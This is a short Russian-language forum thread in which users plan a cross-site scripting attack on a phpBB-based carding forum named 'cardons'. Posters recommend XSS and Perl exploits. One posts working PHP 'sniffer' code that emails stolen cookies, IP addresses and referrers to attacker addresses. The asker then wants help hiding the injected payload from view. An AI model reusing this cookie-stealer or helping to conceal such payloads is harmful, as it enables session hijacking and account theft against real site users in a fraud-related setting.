Почему это XSS непойдет? Главное понимать принципы. Если это web-чат то ничего тебе не мешает использовать там xss.
DeathLess какой веб чат?? это пхпбб форум cardons, пробуй хсс , перл сплойты ( но лучший и рабочий вариант ХСС , если не конечно не самая последняя версия форума)
ну, во-первых, кросс-сайт-скриптинг не тока в интернете работает), ты же можешь прям в сети сниффер разместить у себя на хосте, что к сожалению при обнаружении атаки плохо отразится на твоей безопасности... -простейший сниффер: Code: <? if(isset($QUERY_STRING)) { $date=date('d.m.y : H:i:s'); mail("[email protected], [email protected]", "Kyka npuIIIJIa", "Date and Time: $date\n IP: $REMOTE_ADDR\n Adress: $HTTP_REFERER\n Cookie: $QUERY_STRING"); } ?> - правда лучше сделай чтобы в файл писалось, чтобы не заморачиваться с мэйл серваками... (мануалы по php или перлу ищи на emanual.ru) Во-вторых, насколько я понял, это все тот же форум phpbb, а вовсе не чат, но так и не нашел ответа, отличается ли он чем-нить от простого? (без плюса) В третьих, не верится, что существует лишь одна рабочая версия этого форума, так что плз, пиши сюда нам версию, либо сам смотри на сайтах http://www.security.nnov.ru/ http://securitylab.ru/
Версия 1.52.Cплойтов у меня нету нифига.Щас доделаю сниф тока что писать как для простого phpbb?Просто подскажите что писать чтоб небыло видно этого текста.
